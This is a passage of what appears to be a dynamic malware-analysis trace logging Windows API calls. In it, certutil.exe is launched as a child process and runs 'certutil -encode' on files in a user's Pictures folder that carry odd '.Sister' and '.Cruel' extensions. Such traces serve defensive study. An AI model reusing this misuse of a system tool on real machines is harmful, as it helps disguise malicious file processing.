[0296.838] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0296.838] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0296.838] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0296.838] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0296.838] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2dde9d61070 [0296.838] GetComputerNameW (in: lpBuffer=0x2dde9d61070, nSize=0xfcbba7f710 | out: lpBuffer="NQDPDE", nSize=0xfcbba7f710) returned 1 [0296.839] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xfcbba7f6e0 | out: lpBuffer=0x0, nSize=0xfcbba7f6e0) returned 0 [0296.839] GetLastError () returned 0xea [0296.839] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2dde9d4b790 [0296.839] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x2dde9d4b790, nSize=0xfcbba7f6e0 | out: lpBuffer="NQdPdE", nSize=0xfcbba7f6e0) returned 1 [0296.840] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0296.844] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x2dde9d61740, cbCertEncoded=0x13a40) returned 0x0 [0296.850] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x2dde9d61740, cbCrlEncoded=0x13a40) returned 0x0 [0296.853] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x2dde9d61740, cbEncoded=0x13a40, dwFlags=0x8000, pDecodePara=0xfcbba7f5c0, pvStructInfo=0xfcbba7f650, pcbStructInfo=0xfcbba7f644 | out: pvStructInfo=0xfcbba7f650, pcbStructInfo=0xfcbba7f644) returned 0 [0296.854] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x2dde9d61740, cbEncoded=0x13a40, dwFlags=0x8000, pDecodePara=0xfcbba7f5c0, pvStructInfo=0xfcbba7f650, pcbStructInfo=0xfcbba7f644 | out: pvStructInfo=0xfcbba7f650, pcbStructInfo=0xfcbba7f644) returned 0 [0296.854] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x2dde9d61740, cbEncoded=0x13a40, dwFlags=0x8000, pDecodePara=0xfcbba7f5c0, pvStructInfo=0xfcbba7f650, pcbStructInfo=0xfcbba7f644 | out: pvStructInfo=0xfcbba7f650, pcbStructInfo=0xfcbba7f644) returned 0 [0296.854] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x2dde9d456c0 [0296.885] CryptMsgUpdate (hCryptMsg=0x2dde9d456c0, pbData=0x2dde9d61740, cbData=0x13a40, fFinal=1) returned 0 [0296.885] GetLastError () returned 0x8009310b [0296.885] CryptMsgClose (hCryptMsg=0x2dde9d456c0) returned 1 [0296.885] GetFileAttributesExW (in: lpFileName="DCw650z.bmp.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\dcw650z.bmp.sister"), fInfoLevelId=0x0, lpFileInformation=0xfcbba7f670 | out: lpFileInformation=0xfcbba7f670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0264410, ftCreationTime.dwHighDateTime=0x1d5ec5b, ftLastAccessTime.dwLowDateTime=0xd7d8d080, ftLastAccessTime.dwHighDateTime=0x1d5ed43, ftLastWriteTime.dwLowDateTime=0xd7d8d080, ftLastWriteTime.dwHighDateTime=0x1d5ed43, nFileSizeHigh=0x0, nFileSizeLow=0x13a40)) returned 1 [0296.885] _vsnwprintf (in: _Buffer=0xfcbba7f678, _BufferCount=0xb, _Format="%d", _ArgList=0xfcbba7f668 | out: _Buffer="359") returned 3 [0296.886] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xfcbba7f430, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0296.886] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2dde9d61670 [0296.886] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.886] _vsnwprintf (in: _Buffer=0xfcbba7e660, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xfcbba7f6b8 | out: _Buffer="Input Length = 80448") returned 20 [0296.887] GetFileType (hFile=0x50) returned 0x2 [0296.887] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfcbba7e660*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xfcbba7e614, lpReserved=0x0 | out: lpBuffer=0xfcbba7e660*, lpNumberOfCharsWritten=0xfcbba7e614*=0x14) returned 1 [0296.888] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.888] _vsnwprintf (in: _Buffer=0xfcbba7e660, _BufferCount=0x1ff, _Format="\n", _ArgList=0xfcbba7f6b8 | out: _Buffer="\n") returned 1 [0296.888] GetFileType (hFile=0x50) returned 0x2 [0296.888] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfcbba7e660*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xfcbba7e614, lpReserved=0x0 | out: lpBuffer=0xfcbba7e660*, lpNumberOfCharsWritten=0xfcbba7e614*=0x1) returned 1 [0296.915] GetFileAttributesExW (in: lpFileName="DCw650z.bmp.Cruel" (normalized: "c:\\users\\fd1hvy\\pictures\\dcw650z.bmp.cruel"), fInfoLevelId=0x0, lpFileInformation=0xfcbba7f670 | out: lpFileInformation=0xfcbba7f670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb92d3b7, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xdb92d3b7, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdb954b7c, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x1b050)) returned 1 [0296.915] _vsnwprintf (in: _Buffer=0xfcbba7f678, _BufferCount=0xb, _Format="%d", _ArgList=0xfcbba7f668 | out: _Buffer="361") returned 3 [0296.915] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xfcbba7f430, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0296.915] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x2dde9d61100 [0296.915] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.915] _vsnwprintf (in: _Buffer=0xfcbba7e660, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xfcbba7f6b8 | out: _Buffer="Output Length = 110672") returned 22 [0296.915] GetFileType (hFile=0x50) returned 0x2 [0296.915] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfcbba7e660*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0xfcbba7e614, lpReserved=0x0 | out: lpBuffer=0xfcbba7e660*, lpNumberOfCharsWritten=0xfcbba7e614*=0x16) returned 1 [0296.918] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.918] _vsnwprintf (in: _Buffer=0xfcbba7e660, _BufferCount=0x1ff, _Format="\n", _ArgList=0xfcbba7f6b8 | out: _Buffer="\n") returned 1 [0296.918] GetFileType (hFile=0x50) returned 0x2 [0296.918] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfcbba7e660*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xfcbba7e614, lpReserved=0x0 | out: lpBuffer=0xfcbba7e660*, lpNumberOfCharsWritten=0xfcbba7e614*=0x1) returned 1 [0296.923] LocalFree (hMem=0x2dde9d61740) returned 0x0 [0296.923] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0296.923] _vsnwprintf (in: _Buffer=0xfcbba7f6d8, _BufferCount=0xb, _Format="%d", _ArgList=0xfcbba7f6c8 | out: _Buffer="2022") returned 4 [0296.923] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xfcbba7f490, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0296.923] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x2dde9d390c0 [0296.923] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.923] _vsnwprintf (in: _Buffer=0xfcbba7e6c0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xfcbba7f718 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0296.923] GetFileType (hFile=0x50) returned 0x2 [0296.923] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfcbba7e6c0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xfcbba7e674, lpReserved=0x0 | out: lpBuffer=0xfcbba7e6c0*, lpNumberOfCharsWritten=0xfcbba7e674*=0x31) returned 1 [0296.924] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.924] _vsnwprintf (in: _Buffer=0xfcbba7e6c0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xfcbba7f718 | out: _Buffer="\n") returned 1 [0296.924] GetFileType (hFile=0x50) returned 0x2 [0296.924] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfcbba7e6c0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xfcbba7e674, lpReserved=0x0 | out: lpBuffer=0xfcbba7e6c0*, lpNumberOfCharsWritten=0xfcbba7e674*=0x1) returned 1 [0296.937] LocalFree (hMem=0x0) returned 0x0 [0296.937] LocalFree (hMem=0x2dde9d343d0) returned 0x0 [0296.937] LocalFree (hMem=0x2dde9d3f2d0) returned 0x0 [0296.937] SetLastError (dwErrCode=0x80070716) [0296.937] _vsnwprintf (in: _Buffer=0xfcbba7f748, _BufferCount=0xb, _Format="%d", _ArgList=0xfcbba7f738 | out: _Buffer="511") returned 3 [0296.938] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xfcbba7f500, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0296.938] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2dde9d614f0 [0296.938] PostQuitMessage (nExitCode=0) [0296.938] GetMessageW (in: lpMsg=0xfcbba7fd40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xfcbba7fd40) returned 0 [0296.938] LocalFree (hMem=0x2dde9d4b790) returned 0x0 [0296.938] LocalFree (hMem=0x2dde9d61070) returned 0x0 [0296.938] LocalFree (hMem=0x0) returned 0x0 [0296.939] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0296.939] GetLastError () returned 0x7e [0296.940] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0296.940] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0296.940] DllMain () returned 0x1 [0296.940] LocalFree (hMem=0x2dde9d4b5d0) returned 0x0 [0296.940] LocalFree (hMem=0x2dde9d41d60) returned 0x0 [0296.940] LocalFree (hMem=0x2dde9d61670) returned 0x0 [0296.940] LocalFree (hMem=0x2dde9d61100) returned 0x0 [0296.940] LocalFree (hMem=0x2dde9d390c0) returned 0x0 [0296.940] LocalFree (hMem=0x2dde9d614f0) returned 0x0 [0296.940] LocalFree (hMem=0x2dde9d44780) returned 0x0 [0296.940] LocalFree (hMem=0x2dde9d42210) returned 0x0 [0296.941] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0296.941] GetLastError () returned 0x7e [0296.941] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0296.941] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0296.941] DllMain () returned 0x1 [0296.941] exit (_Code=0) Thread: id = 118 os_tid = 0xe20 Process: id = "46" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x1bac3000" os_pid = "0xe2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"E8sv92vO_xVbOO.jpg.Sister\" \"E8sv92vO_xVbOO.jpg.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Pictures\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 119 os_tid = 0xe30 [0297.328] GetStartupInfoW (in: lpStartupInfo=0x88dc47f910 | out: lpStartupInfo=0x88dc47f910*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"E8sv92vO_xVbOO.jpg.Sister\" \"E8sv92vO_xVbOO.jpg.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0297.330] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0297.330] __set_app_type (_Type=0x1) [0297.330] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0297.330] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0297.333] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0297.333] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0297.334] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0297.334] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0297.335] WerSetFlags () returned 0x0 [0297.335] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0297.335] __iob_func () returned 0x7ffcea2dea00 [0297.335] _fileno (_File=0x7ffcea2dea30) returned 1 [0297.335] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0297.335] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0297.336] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0297.336] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0297.336] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0297.337] GetConsoleOutputCP () returned 0x1b5 [0297.338] _vsnwprintf (in: _Buffer=0x88dc47f880, _BufferCount=0xb, _Format=".%d", _ArgList=0x88dc47f7a8 | out: _Buffer=".437") returned 4 [0297.338] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0297.338] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0297.338] GetFileType (hFile=0x50) returned 0x2 [0297.338] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0297.339] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0297.339] SetThreadUILanguage (LangId=0x0) returned 0x409 [0297.339] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0297.339] GetCommandLineW () returned="certutil -encode \"E8sv92vO_xVbOO.jpg.Sister\" \"E8sv92vO_xVbOO.jpg.Cruel\"" [0297.339] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2692e9ab770 [0297.339] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2692e99cdc0 [0297.340] LocalFree (hMem=0x2692e9ab770) returned 0x0 [0297.340] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2692e99c230 [0297.340] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x2692e99c1d0 [0297.340] LocalFree (hMem=0x2692e99c230) returned 0x0 [0297.340] LocalFree (hMem=0x2692e99cdc0) returned 0x0 [0297.340] LocalFree (hMem=0x0) returned 0x0 [0297.340] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0297.340] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0297.341] GetCommandLineW () returned="certutil -encode \"E8sv92vO_xVbOO.jpg.Sister\" \"E8sv92vO_xVbOO.jpg.Cruel\"" [0297.341] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2692e9aba50 [0297.341] GetSystemTime (in: lpSystemTime=0x88dc47f570 | out: lpSystemTime=0x88dc47f570*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0xb, wMilliseconds=0x371)) [0297.341] SystemTimeToFileTime (in: lpSystemTime=0x88dc47f570, lpFileTime=0x88dc47f568 | out: lpFileTime=0x88dc47f568) returned 1 [0297.341] FileTimeToLocalFileTime (in: lpFileTime=0x88dc47f568, lpLocalFileTime=0x88dc47f530 | out: lpLocalFileTime=0x88dc47f530) returned 1 [0297.341] FileTimeToSystemTime (in: lpFileTime=0x88dc47f530, lpSystemTime=0x88dc47f2a0 | out: lpSystemTime=0x88dc47f2a0) returned 1 [0297.341] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x88dc47f2a0, lpFormat=0x0, lpDateStr=0x88dc47f3b0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0297.341] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x88dc47f2a0, lpFormat=0x0, lpTimeStr=0x88dc47f2b0, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0297.341] _vsnwprintf (in: _Buffer=0x88dc47f2be, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x88dc47f288 | out: _Buffer=" 11.881s") returned 8 [0297.341] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x2692e9aded0 [0297.341] SetLastError (dwErrCode=0x80070716) [0297.341] _vsnwprintf (in: _Buffer=0x88dc47f338, _BufferCount=0xb, _Format="%d", _ArgList=0x88dc47f328 | out: _Buffer="948") returned 3 [0297.341] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x88dc47f0f0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0297.342] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2692e9ab8f0 [0297.342] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x2692e9a20f0 [0297.342] LocalFree (hMem=0x2692e9aded0) returned 0x0 [0297.342] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x88dc47f5e0 | out: lpSystemTimeAsFileTime=0x88dc47f5e0*(dwLowDateTime=0xdbd6a768, dwHighDateTime=0x1d6141f)) [0297.342] GetLocalTime (in: lpSystemTime=0x88dc47f618 | out: lpSystemTime=0x88dc47f618*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0xb, wMilliseconds=0x372)) [0297.342] SystemTimeToFileTime (in: lpSystemTime=0x88dc47f618, lpFileTime=0x88dc47f5f0 | out: lpFileTime=0x88dc47f5f0) returned 1 [0297.342] CompareFileTime (lpFileTime1=0x88dc47f5f0, lpFileTime2=0x88dc47f5e0) returned 1 [0297.342] _vsnwprintf (in: _Buffer=0x88dc47f628, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x88dc47f5b8 | out: _Buffer="GMT + 2.00") returned 10 [0297.342] LocalFree (hMem=0x2692e9aba50) returned 0x0 [0297.343] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0297.343] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0297.343] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0297.343] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0297.343] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0297.343] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x88dc47f658 | out: _Buffer="10.0.15063.447") returned 14 [0297.343] GetACP () returned 0x4e4 [0297.343] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0297.343] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2692e9ab6b0 [0297.343] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2692e9ab6b0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0297.343] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2692e9ae410 [0297.343] _vsnwprintf (in: _Buffer=0x2692e9ae410, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x88dc47f6a8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0297.343] LocalFree (hMem=0x2692e9ab6b0) returned 0x0 [0297.343] LocalFree (hMem=0x0) returned 0x0 [0297.343] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0297.343] GetACP () returned 0x4e4 [0297.343] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0297.344] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2692e9ab570 [0297.344] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2692e9ab570, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0297.344] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2692e9adf10 [0297.344] _vsnwprintf (in: _Buffer=0x2692e9adf10, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x88dc47f6a8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0297.344] LocalFree (hMem=0x2692e9ab570) returned 0x0 [0297.344] LocalFree (hMem=0x0) returned 0x0 [0297.344] GetACP () returned 0x4e4 [0297.344] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0297.344] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2692e9ab570 [0297.344] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2692e9ab570, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0297.344] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2692e9ae210 [0297.344] _vsnwprintf (in: _Buffer=0x2692e9ae210, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x88dc47f6d8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0297.344] LocalFree (hMem=0x2692e9ab570) returned 0x0 [0297.344] LocalFree (hMem=0x2692e9ae410) returned 0x0 [0297.344] LocalFree (hMem=0x2692e9adf10) returned 0x0 [0297.344] LocalFree (hMem=0x2692e9ae210) returned 0x0 [0297.344] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0297.345] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0297.345] GetStockObject (i=0) returned 0x900010 [0297.345] RegisterClassW (lpWndClass=0x88dc47f800) returned 0xc1a2 [0297.345] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2202c8 [0297.369] NtdllDefWindowProc_W () returned 0x0 [0297.369] NtdllDefWindowProc_W () returned 0x1 [0297.376] NtdllDefWindowProc_W () returned 0x0 [0297.386] UpdateWindow (hWnd=0x2202c8) returned 1 [0297.386] PostMessageW (hWnd=0x2202c8, Msg=0x400, wParam=0x0, lParam=0x2692e99217e) returned 1 [0297.386] GetMessageW (in: lpMsg=0x88dc47f850, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x88dc47f850) returned 1 [0297.386] TranslateMessage (lpMsg=0x88dc47f850) returned 0 [0297.386] DispatchMessageW (lpMsg=0x88dc47f850) returned 0x0 [0297.386] NtdllDefWindowProc_W () returned 0x0 [0297.386] GetMessageW (in: lpMsg=0x88dc47f850, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x88dc47f850) returned 1 [0297.386] TranslateMessage (lpMsg=0x88dc47f850) returned 0 [0297.387] DispatchMessageW (lpMsg=0x88dc47f850) returned 0x0 [0297.387] LocalAlloc (uFlags=0x0, uBytes=0x7e) returned 0x2692e994420 [0297.387] LocalAlloc (uFlags=0x0, uBytes=0x8a) returned 0x2692e9995a0 [0297.387] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0297.387] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0297.387] SetLastError (dwErrCode=0x80070716) [0297.387] _vsnwprintf (in: _Buffer=0x88dc47f258, _BufferCount=0xb, _Format="%d", _ArgList=0x88dc47f248 | out: _Buffer="465") returned 3 [0297.387] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x88dc47f010, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0297.387] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2692e99c080 [0297.388] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0297.388] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0297.388] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x88dc47eff0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0297.388] GetLastError () returned 0xcb [0297.388] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0297.388] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0297.388] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0297.388] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0297.389] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0297.389] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0297.389] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0297.389] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0297.389] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0297.389] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0297.389] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0297.389] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0297.389] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0297.389] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0297.389] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0297.389] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0297.389] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0297.389] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0297.389] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 